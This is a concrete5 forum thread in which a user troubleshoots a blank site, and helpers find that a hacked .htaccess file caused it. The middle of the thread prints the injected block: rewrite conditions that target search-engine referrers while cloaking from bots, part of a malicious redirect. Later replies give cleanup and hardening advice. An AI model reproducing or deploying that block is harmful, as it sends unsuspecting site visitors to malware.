Blank site, What have I done?

Permalink
Hi all,
I was wondering if anyone could help me!
For some reason one of my sites has gone blank and I have no idea why.
http://www.hotspotgo.com
I have checked through the forums but cant find anything that is glaringly obvious.

Any relevant pointers will be greatly received.

Best wishes
Sean

SeanBrogan
 
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Are you able to review any error logs on your server?

This is most likely a PHP parsing error and the log file will tell you where the problem is. Alternatively you might be able to set PHP to output errors to the screen via php.ini or httpd.conf if you can get access to those.
SeanBrogan replied on at Permalink Reply
SeanBrogan
Yeh I checked the error logs already, nothing there except logs for feb on a seperate wordpress installation.
Nothing else seems to be wrong, thanks for the pointer though.
SeanBrogan replied on at Permalink Reply
SeanBrogan
I am really struggling to fix this, really hoping someone else can come up with some ideas before I decide to re-install.
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Just to confirm it is a problem with C5, if you upload a test file (for example test.htm) with some static content in it, can you view it ok?
pvernaglia replied on at Permalink Reply
pvernaglia
check config/site.php make sure you don't have any blank lines in it.
SeanBrogan replied on at Permalink Reply
SeanBrogan
Yeh I can view:
www.www.hotspotgo.com/test.html...

I checked the site.php and removed 3 blank lines but that did not work either.

Open to any other suggestions.

Thanks for the replies so far guys!
DWD replied on at Permalink Reply
As the first reply said, it maybe an PHP parsing error. Most likely error reporting is turned off, if your site is in "Production Mode", try to turn it on temporarily by adding the following to your .htaccess file in the root of your site via FTP.
php_flag display_errors on


If it works, when you load the site, you'll see the error and be able to track it down and fix it.

If you are able to fix it, just remember to go back to your .htaccess file and either comment out the line above or remove it completely.

HTH
Dave
SeanBrogan replied on at Permalink Reply
SeanBrogan
Ok, thanks DWD for that explanaition, I now have an internal server error 500.
I will contact my host provider and see what they say.
DWD replied on at Permalink Reply
No problem, I saw that.

If your host doesn't offer any solutions. PM me and I'll see if I can help you further.

Additionally if you found this answer helpful please mark it as answered so others know a solution was found.

Thanks
Dave
SeanBrogan replied on at Permalink Reply
SeanBrogan
Hey DWD,
Yes on all counts, will do.
Thanks again!
SeanBrogan replied on at Permalink Reply
SeanBrogan
I got this response from the host support:

Dear Customer,

Sorry for the delay in my response.

You have this problem because you have the incorrect settings into ".htaccess" file.
Please check this file into your domains content.

So can anyone throw some light on this! I just dont understand how this has happened as it was working and I had not touched the htaccess file.

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
1stWebDesigns replied on at Permalink Reply
1stWebDesigns
Try removing everything ABOVE the line which says:

# -- concrete5 urls start --

If that gets it working again, you can narrow down from there where the problem lies in the .htaccess file.
ThemeGuru replied on at Permalink Reply
ThemeGuru
Make sure you bump up security on your server and only use SFTP.
SeanBrogan replied on at Permalink Reply
SeanBrogan
I tried that and it didnt work. Maybe I need to look at another site and see what the htaccess file says.

This is bugging me!
SeanBrogan replied on at Permalink Reply
SeanBrogan
Nope on other sites that are working, the htaccess files are the same.
Any one else got any other ideas.

In the mean time I am going back to my host support and explaining that the files are the same.
pvernaglia replied on at Permalink Reply
pvernaglia
How did you get blank lines in site.php? Were you doing something before the site went blank? The only time I have seen a site go blank is when there was something in site.php that didn't belong there

try copying the C5 installation files up to the site again
SeanBrogan replied on at Permalink Reply
SeanBrogan
The blank lines I believe are written by the theme that I have installed, Luminosity.
I dont think this is the issue and I am still pursuing my host support because I believe this is a server issue. The reason for that belief is because no actual files were manually adjusted on the site other than the normal editing within the concrete editor etc.

I will let you know what my host support comes back with.

Best wishes
Sean
DWD replied on at Permalink Reply
Sean,

Sorry for my delayed response. From looking at your .htaccess a couple posts up, it seems your site was hacked and is now redirecting all traffic to http://two way serf.com (Spaces added on purpose). To answer your question a couple posts back, a vanilla Concrete5 .htaccess should be blank.

And after you turn on "prettyURLS" from dashboard it would look like this (if installed on your root):
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase / 
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
</IfModule>

You said you have cleared the everything above
# -- concrete5 urls start --
as 1stWebDesigns recommended to no avail, if so other files may been infected with malicious code
The easiest way to see if other files were touched by malicious code, is to look at the date modified via FTP. If you find them all to be the same (within a minute or two), I would locate the malicious code in one of the files and have your host locate and remove it, it will either be right at the beginning or at the end of the PHP file.
Or do as @pvernaglia said and copy the concrete5 files back to the server, but make sure to back up first just in case.

Also I noticed you said your other concrete sites had the same .htaccess files, if so you may have some work ahead of you.

HTH

Dave
DWD replied on at Permalink Reply
So I did a little more research and found clicking on direct links to your site from Google is blocked by McAfee SiteAdvisor, with a malware warning.

So depending how much time you have on customizing your site you can either A. start from scratch or B. repair all infected files.

But before you do anything I would switch to SFTP as ThemeGuru suggested and change all your passwords, cPanel, mysql, FTP, etc.

Most likely it looks like an XSS hack.

Let me know if I may help further.

Dave